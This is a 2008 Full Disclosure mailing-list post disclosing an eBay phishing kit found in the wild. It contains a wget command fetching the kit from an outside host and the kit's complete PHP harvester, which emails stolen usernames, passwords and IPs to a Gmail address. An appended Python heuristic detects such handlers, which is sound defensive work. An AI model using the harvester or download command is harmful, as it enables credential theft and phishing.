Full Disclosure mailing list archives
Fresh Phish anyone?
From: "Kevin Finisterre (lists)" <kf_lists () digitalmunition com>
Date: Mon, 22 Dec 2008 13:32:50 -0500
Someone is bored and out making the rounds exploiting random asp pages and web-services.

wget http://www.adehkz.net/eb.zip

<?php
session_start();
$userid = $_POST['userid'];
$password = $_POST['password'];
$ip = getenv("REMOTE_ADDR");
$subj = "eB - $userid";
$msg = "Username: $userid\nPassword: $password\n....\nIP: $ip";
mail("asdfwr () gmail com", $subj, $msg);
header("Location: https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&errmsg=8&pUserId=&co_partnerId=2&siteid=0&pageType=1883&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fmy.ebay.com%2Fws%2FeBayISAPI.dll%3FMyeBay&pp=&migrateVisitor=1 ");
?>

I passed this on to the SANS handlers a few days ago but the site is still up and running.

Enjoy
-KF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
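Added example, not part of the original post: a heuristic a site owner could run over PHP files in a web root to spot a form handler of the kind quoted above, one that reads a password field, mails it out, and then redirects the visitor to another host. The function name, the field-name patterns and all sample hosts and addresses are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Request fields read by the handler, e.g. $_POST['password']
POST_FIELD = re.compile(r"""\$_(?:POST|REQUEST)\s*\[\s*['"]([^'"]+)['"]\s*\]""")
# Bare mail( call, not a method such as $mailer->mail( or a helper like send_mail(
MAIL_CALL = re.compile(r"(?<![\w>$])mail\s*\(", re.I)
# Absolute redirect target in header("Location: ...")
REDIRECT = re.compile(r"""header\s*\(\s*['"]Location:\s*(https?://[^'"\s]+)""", re.I)
SECRET_NAME = re.compile(r"pass|pwd|cvv", re.I)  # assumed naming conventions

def analyze(php_source, own_hosts=()):
    """Return the signals found in one PHP source string plus a verdict."""
    fields = sorted(set(POST_FIELD.findall(php_source)))
    secrets = [f for f in fields if SECRET_NAME.search(f)]
    hosts = {urlsplit(u).hostname for u in REDIRECT.findall(php_source)}
    external = sorted(h for h in hosts if h and h not in own_hosts)
    signals = {
        "secret_fields": secrets,
        "mails_out": bool(MAIL_CALL.search(php_source)),
        "external_redirects": external,
        "records_client_ip": "REMOTE_ADDR" in php_source,
    }
    # Flag only when all three occur together: secret read, mailed, visitor sent elsewhere.
    signals["suspicious"] = bool(secrets and signals["mails_out"] and external)
    return signals

# Constructed samples; every host and address below is a placeholder.
HARVESTER = r'''<?php
$userid = $_POST['userid'];
$password = $_POST['password'];
$ip = getenv("REMOTE_ADDR");
mail("collector@example.invalid", "eB - $userid", "Password: $password\nIP: $ip");
header("Location: https://signin.brand.example/login?errmsg=8");
?>'''

CONTACT_FORM = r'''<?php
$from = $_POST['email'];
mail("support@shop.example", "Contact form", $_POST['message']);
header("Location: /thanks.php");
?>'''

LOGIN = r'''<?php
if (check_login($_POST['user'], $_POST['password'])) {
    header("Location: https://shop.example/account");
}
?>'''
```

Pass the site's own hostnames as own_hosts so legitimate post-login redirects are not counted as external; a hit is a reason to review the file, not proof of compromise.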